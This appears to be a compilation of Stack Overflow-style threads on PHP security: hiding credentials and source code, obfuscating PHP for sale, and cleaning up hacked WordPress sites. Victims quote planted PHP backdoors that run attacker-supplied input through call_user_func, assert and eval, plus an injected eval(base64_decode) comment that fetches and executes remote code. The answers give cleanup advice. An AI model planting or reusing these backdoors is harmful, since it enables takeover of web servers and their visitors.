This question already has answers here:
PHP source code security on server
(8 answers)
Closed 9 years ago.
If I have a php code on my website is there any way for a user to view it? I ask because I'm using the Pear mail package (I might change before I upload my website), and it requires my email and password be in the code for it to use. Is this a potential security risk, or is there no way for the user to see this code anyways?
While we are at it, is there a good guide for hackers on how to exploit security risks(specifically SQL injections and similar methods)? It would be useful when checking my site's security, if I had a full list of all the common things that hackers try, and explanations for how to do them.
Keeping a password in a PHP program file is extremely common practice.
As long as you've named all your files with a .php extension, and your server is configured to process .php files as PHP code, then you shouldn't have any problems.
Don't use a .inc extension or anything like that, because yes, that might expose your code.
Also, it's generally a good idea to place as much of your PHP code as possible outside of the web-accessible areas. Only your base PHP file that is actually loaded on startup should be web accessible. All your includes and libraries should be safely stashed away somewhere else where they can be included, but can't be read directly.
This function will cover it:
highlight_string
Related
This question already has answers here:
wordpress hacked: what does this script actually do?
(2 answers)
Closed 4 years ago.
I have several web sites on a shared server, and have noticed a load of .php files appear in various folders, none of which were put there by me.
I am a .NET developer, so apart from one site which uses WordPress, none of my sites use PHP. Therefore, I can only assume that the server has been accessed, and suspicious files uploaded.
However, with my basic knowledge of PHP, I can't tell what these files are doing. I am hoping some PHP expert can help me.
Here is a sample...
<?php if(key($_GET)=='35')call_user_func($_GET['35'],$_REQUEST['c'],$_REQUEST['d']);
...and another...
<?php
$acnhe="s\x74\x72\x5fr\x65\x70\x6ca\x63e";$admno=$acnhe('f','',"b\x66afsfef6f4f_\x66dfefcfofd\x66e");$acnhe=$admno($acnhe('|','',$_POST['1043f']));$adnmo="\x61ss\145".'rt';#$adnmo($acnhe);#eval($acnhe);
$k=substr("class",2)."ert"; # $k(${"_PO"."ST"} ['335']);
Anyone able to explain what these would do if/when called?
Your wordpress site has been compromised. It's quite common that unpatched security vulnerabilities in WP allow users to inject these kinds of files which end up causing all sorts of trouble to your visitors (by redirecting them to malicious sites, for example).
You can safely delete this file, and you should do it ASAP.
Also, it's time to secure your WP installation (update the core to the latest version) and go through all of WP's core php files and look for similar strings within them (these malicious exploits sometimes allow core WP files to get injected too) and clean them up.
This question already has answers here:
How to get rid of eval-base64_decode like PHP virus files?
(8 answers)
Closed 6 years ago.
I'm using a wordpress blog today i got a comment like this .
<!-- unsafe comment zapped --> eval(base64_decode("JGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3dvcmRwcmVzcy1jb3JlL3VwZGF0ZS1mcmFtZXdvcmsudHh0Iik7ZXZhbCgkZGF0YSk7")); --><!--/mfunc-->
When i've decoded this comment using decoder i got
$data = file_get_contents("https://s3.amazonaws.com/wordpress-core/update-framework.txt");eval($data);
I'm getting many comments like this . Can anyone help me to resolve this problem .? Is it a Hack or does it shows the beginning of hacking ?
It is a hack or at least an attempt. They are taking advantage of an unresolved wordpress vulnerability that can allow them to download and executing code among other things. This type of attack has very little public exposure at the moment on the web and can be particularly nasty if it is originating from an educated source. If you notice these type of code snippets around your server side then please do more research to determine if you are truly infected and if so, to what level the infection has actually gone. I have seen entire shared hosting servers infected from individual wordpress site admins either allowing via ignorance or actively helping this problem propagate. Unfortunately this particular problem is currently not very well documented on the web so you will likely have to do a good bit of research to be sure your site is OK. To help you research I'll clarify the terminology of this hack.
This is a PHP Code Injection attack that is most likely attempting to exploit a known vulnerability in the wordpress framework. It is using Base64 encoded PHP code to inject itself onto your hosting server via eval() which is a programming language construct that is present in nearly all programming languages, including PHP. Hacker's with extremely organized and advanced abilities have made use of this exploit recently to wreak absolute havoc on compromised wordpress sites so be extremely careful when handling this type of problem.
None of the suggestions worked for us. The following is how we removed malicious code from multiple wordpress sites without any downtime.
We ran into a problem where we had multiple legacy wordpress sites sharing one filesystem that was infiltrated by this virus.
We ended up writing a little python script to traverse our filesystem and detect the malicious code.
Here's the code for anyone interested (NOTE: USE AT OWN RISK):
https://github.com/michigan-com/eval_scrubber
pip install eval_scrubber
// finds all infected files, will not do anything but READ
python -m eval_scrubber find .
// attempts to remove malicious code from files, potentially dangerous because it WRITEs
python -m eval_scrubber remove .
That scripts will scan the filesystem for malicious content and as a separate command it will attempt to remove the base64 eval functions.
This is really a temporary solution because the generator of this virus uses PHP comments to cause the regex to not match. We ended up using auditd to monitor what file is writing to a file we knew was getting infected: http://www.cyberciti.biz/tips/linux-audit-files-to-see-who-made-changes-to-a-file.html
Once we found the generator of the virus, did one more eval_scrubber remove and then our problem was fixed.
I was searching for a good and fast solution. This will help you find which files are infected with eval64. Then you can use search/replace in Dreamweaver and remove it from all files at once.
Threat scan plugin
BUT
There was an index file with short 2 lines of code. That 2 lines were injecting eval over and over. I forgot which index.php it was but look in folders:
wp-admin
wp-content
wp-include
Try to search for md5 in your files using Dreamweaver.
Hope you'll be able to fix it.
This question already has answers here:
Convert a PHP script into a stand-alone windows executable
(7 answers)
Closed 9 years ago.
I have shown this Convert a PHP script into a stand-alone windows executable , but my problem is still remains :(
I have developed a Offline Application using Core P.H.P., now I want to Sell it to my client, but my problem is that I don't want to allow Client can see my Source code or can access my Source code, they can run my application on their system but cannot able to change the Code.
If I made the .EXE of my application, user cannot even copy my source code, if he/she had done this then it cannot remains useful for them,
AND ALSO THE MAIN THING IS I WANT A UNIQUE SECURITY FOR A PARTICULAR USER, EVERY USER SHOULD NOT HAVE THE SAME ACCESS KEY TO ACCESS THIS APPLICATION
I have found this on GOOGLE and also on this SITE also,but still I didn't get my answer perfectly.
Actually I have no idea about this in P.H.P, If somebody found mistakes in my question then you are pleased to suggest me.
You can use PHP LockIt Software. it will encode your code and your client can not modify your code.
Take a look at hiphop php. A good and reliable 'compiler' for PHP
http://en.wikipedia.org/wiki/HipHop_for_PHP
https://github.com/facebook/hiphop-php/
Check Zend Guard.
Zend Guard, the most widely accepted PHP encoding and obfuscation product on the market, protects your application from unlicensed use and reverse engineering.
Prevent reverse engineering & unauthorized modifications
Protect your code from unauthorized use
Zend Optimizer and Zend Guard Loader - the free runtime decoders for Zend Guard
It's really good solution to protect your project.
This question already has answers here:
Closed 11 years ago.
Possible Duplicate:
Security of PHP script, embedded or otherwise
Many PHP apps available for download (Wordpress, for example) contain configuration files including sensitive information (passwords, database login details, etc.). Are these files really secure? I know if someone navigates to them directly or tries to download them (via http://www.example.com/admin/config.php for example) all they will see is a blank page without any data on it. However, I am still wary. Might you be able to enlighten me regarding file security best practices in this regard? Thank you!
They are typically safe. However, best is to include the configuration file from above the public_html folder so direct access is not possible. Otherwise there are tons of other ways to keep them safe.
In general, they are save. But if somehow possible, they should be moved to a directory not reachable from the web, because if for whatever reason the php parser stops working and spits out plaintext sourcecode, your configs wont be visible.
This question already has answers here:
Closed 11 years ago.
Possible Duplicate:
Minify / Obfuscate PHP Code
I have a php file. Anyone knows of any encryption technics/keys to encrypt the code? I don't want to make it human readable. I was thinking if i could include the encrypt keys in an include file hosted separately somewhere. Any help and ideas?
Are you looking for something like Zend Guard ?
Zend Guard, the most widely accepted PHP encoding and obfuscation product on the market, protects your application from unlicensed use and reverse engineering.
I think the best way is to obfuscate the code. i've never do that on php, but i use yui for JS Code. I google'it and found http://www.codeeclipse.com/. Try that.
Nobody who cares a bit about security is going to use your app if it wants to include - e.g. EXECUTE - code from your server, loaded at runtime.
The only real solution if you really need to encrypt your code (usually you don't!) is buying ioncube or zend encoder to compile the PHP code to a bytecode which is then executed by a zend extension in the PHP core (i.e. the user needs to be able to load php extensions)